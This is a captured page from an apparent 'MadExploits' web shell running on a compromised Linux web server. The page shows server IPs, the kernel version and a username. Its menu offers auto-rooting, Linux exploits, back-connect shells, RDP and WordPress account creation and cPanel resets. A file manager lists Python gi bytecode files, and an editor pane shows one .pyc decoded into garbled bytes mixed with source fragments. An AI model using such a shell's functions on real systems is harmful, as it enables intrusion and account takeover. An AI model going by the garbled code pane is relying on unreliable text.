Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
gi /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
4.23
KB
-rw-r--r--
_constants.cpython-310.pyc
1.04
KB
-rw-r--r--
_error.cpython-310.pyc
1.42
KB
-rw-r--r--
_gtktemplate.cpython-310.pyc
7.52
KB
-rw-r--r--
_option.cpython-310.pyc
10.5
KB
-rw-r--r--
_ossighelper.cpython-310.pyc
4.98
KB
-rw-r--r--
_propertyhelper.cpython-310.py...
9.94
KB
-rw-r--r--
_signalhelper.cpython-310.pyc
7.77
KB
-rw-r--r--
docstring.cpython-310.pyc
3.77
KB
-rw-r--r--
importer.cpython-310.pyc
3.65
KB
-rw-r--r--
module.cpython-310.pyc
5.17
KB
-rw-r--r--
pygtkcompat.cpython-310.pyc
535
B
-rw-r--r--
types.cpython-310.pyc
7.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docstring.cpython-310.pyc
o ��b] � @ s d dl mZmZmZmZmZmZmZ dadd� Z dd� Z dd� Zi eje �eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�eje�ej e!�ej"e!�ej#e!ej$dej%dej&dej'di�Z(d d � Z)dd� Z*d d� Z+dd� Z,e e,� dS )� )� VFuncInfo�FunctionInfo�CallableInfo� ObjectInfo� StructInfo� Direction�TypeTagNc C s | a dS )z�Set doc string generator function :param callable func: Callable which takes a GIInfoStruct and returns documentation for it. N��_generate_doc_string_func)�func� r �./usr/lib/python3/dist-packages/gi/docstring.py�set_doc_string_generator% s r c C s t S )z6Returns the currently registered doc string generator.r r r r r �get_doc_string_generator/ s r c C s t | �S )aE Generate a doc string given a GIInfoStruct. :param gi.types.BaseInfo info: GI info instance to generate documentation for. :returns: Generated documentation as a string. :rtype: str This passes the info struct to the currently registered doc string generator and returns the result. r ��infor r r �generate_doc_string4 s r c C sf | � � }t�|d �}|rt|d�r|jS |tjkr/| �� }|�� }|s'| � � S d|� � |f S | � � S )N�__name__z%s.%s)Zget_tag�_type_tag_to_py_type�get�hasattrr r � INTERFACEZ get_interface�get_nameZget_tag_as_stringZ get_namespace)Zgi_typeZtype_tagZpy_typeZifaceZ info_namer r r �_get_pytype_hint\ s r c C s� g }t | t�rdg}nt | t�r| �� rdg}| �� }d}t� }t� }|D ]}|�|�� � |�|�� � � � |�|� � � q%t|�D ]?\}}|�� t jkrOqC||v rTqC|�� }t|�� �} | |vrh|d| 7 }|�� sp||v ru|d7 }n|�� r}|d7 }|�|� qCd�|�} g }t| �� �}| �� s�|r�||vr�|}| �� r�|d7 }|�|� t|�D ]*\}}|�� t jkr�q�||v r�q�|�� }t|�� �} | |vr�|d| 7 }|�|� q�|r�d| j| d�|�f S d | j| f S ) N�self)Zvoid�:z=Nonez=<optional>z, z or Nonez%s(%s) -> %sz%s(%s))� isinstancer r Z is_methodZ get_arguments�set�addZget_destroyZget_typeZget_array_lengthZget_closure� enumerateZ get_directionr ZOUTr r Zmay_be_nullZis_optional�append�joinZget_return_typeZskip_returnZmay_return_null�INr ) r Zin_args_strs�argsZhint_blacklistZignore_indicesZuser_data_indices�arg�iZargstrZhintZin_args_strZ out_args_strsZreturn_hintr r r �_generate_callable_info_docn sb r&